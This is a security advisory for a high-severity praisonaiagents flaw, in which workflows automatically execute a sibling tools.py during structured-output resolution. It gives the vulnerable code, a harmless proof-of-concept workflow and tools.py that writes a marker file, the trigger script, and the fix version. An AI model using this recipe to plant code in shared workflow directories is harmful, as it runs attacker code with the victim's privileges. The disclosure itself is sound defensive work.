GHSA-4gfv-wg42-7jw5: High severity pip/praisonaiagents vulnerability

Published Oct 8, 2026
·
Updated

Summary An unsafe dynamic module loading vulnerability allows an attacker who can control a workflow file and a sibling tools.py to execute arbitrary Python code when the workflow is executed.

Details The vulnerability is located in the workflow structured output resolution logic.

File: src/praisonai-agents/praisonaiagents/workflows/workflows.py

Method: AgentFlow.resolvepydanticclass

python if self.filepath: workflowdir = Path(self.filepath).parent toolspath = workflowdir / "tools.py"

if toolspath.exists(): spec = importlib.util.specfromfilelocation("tools", toolspath) toolsmodule = importlib.util.modulefromspec(spec) spec.loader.execmodule(toolsmodule) # Arbitrary code execution

This code is reached during step execution when a step uses a string outputpydantic:

python stepoutputpydantic = getattr(step, 'outputpydantic', None) if stepoutputpydantic and isinstance(stepoutputpydantic, str): resolvedclass = self.resolvepydanticclass(stepoutputpydantic)

filepath is set automatically by: - WorkflowManager.loadworkflow() (used by workspace discovery) - WorkflowManager.createworkflow()

It can also be set manually after loadyaml(): python wf = mgr.loadyaml("workflow.yaml") wf.filepath = "workflow.yaml"

The execmodule() call has no sandboxing and ignores the PRAISONAIALLOWTOOLS environment variables used elsewhere in the project.

PoC Create the following two files in the same directory:

/tmp/attack/attack.yaml yaml name: AttackWorkflow steps: - name: generate action: "Produce structured output" outputpydantic: MaliciousModel

/tmp/attack/tools.py python print("[RCE] Arbitrary code executed from tools.py")

import os with open("/tmp/rcesuccess.txt", "w") as f: f.write(f"RCE executed by PID {os.getpid()}")

class MaliciousModel: @classmethod def modeljsonschema(cls): return {"type": "object"}

Run the following Python code (adjust the path to your PraisonAI source):

python import sys sys.path.insert(0, "/home/user/praisonai/src/praisonai-agents")

from praisonaiagents.workflows import WorkflowManager from praisonaiagents.agent.agent import Agent

mgr = WorkflowManager() wf = mgr.loadyaml("/tmp/attack/attack.yaml")

wf.filepath = "/tmp/attack/attack.yaml"

for step in wf.steps: step.outputpydantic = "MaliciousModel" step.outputpydantic = "MaliciousModel" if not getattr(step, "agent", None): step.agent = Agent( name="researcher", role="Researcher", goal="Generate output", instructions="Return structured data" )

wf.start("trigger")

Impact Type: Execution of Untrusted Local Code via Unsafe Dynamic Module Loading.

Affected users include:

- Users of WorkflowManager(workspacepath=...), where workflow discovery automatically sets filepath. - Users of WorkflowManager.createworkflow(). - Applications that load workflows from repositories, templates, shared workflow collections, CI/CD artifacts, or other directories that may contain untrusted files.

During workflow execution, a string outputpydantic reference causes the framework to automatically locate, import, and execute a sibling tools.py file.

As a result, code contained in tools.py executes with the privileges of the workflow runner without requiring an explicit import or user approval step.

Successful exploitation results in arbitrary Python code execution within the workflow process. An attacker may be able to read local files, access secrets available to the process, modify workflow behavior, perform network operations, or execute additional system commands.

This behavior also bypasses the PRAISONAIALLOWTEMPLATETOOLS / PRAISONAIALLOWLOCALTOOLS protections used elsewhere in the project, allowing code execution through a separate workflow-resolution path.

Affected Software

1 affected componentFixes available
pip/praisonaiagents<=1.6.77
1.6.78

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade pip/praisonaiagents to a version that resolves this vulnerability.

    Fixed in 1.6.78

Event History

Oct 8, 2026
Advisory Published
via GitHub·04:48 PM
Data Sourced
via GitHub·04:48 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What must an attacker control to trigger code execution?

The attacker must be able to control both a workflow file and a sibling file named tools.py. The vulnerable workflow must then be executed.

2

What workflow configuration reaches the vulnerable code path?

A step must use a string-valued output_pydantic setting. During that step's execution, the workflow resolves the requested class and loads the sibling tools.py file when file_path is set.

3

Which workflow-loading scenarios set the required file path automatically?

WorkflowManager._load_workflow(), used by workspace discovery, and WorkflowManager.create_workflow() set file_path automatically. The file path can also be set manually after workflow creation.

4

How can I identify potentially affected workflows?

Review executed workflow directories for a tools.py file next to the workflow file, especially where workflow steps use a string output_pydantic value. Workflows loaded through workspace discovery or created by WorkflowManager are relevant because they automatically receive a file path.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203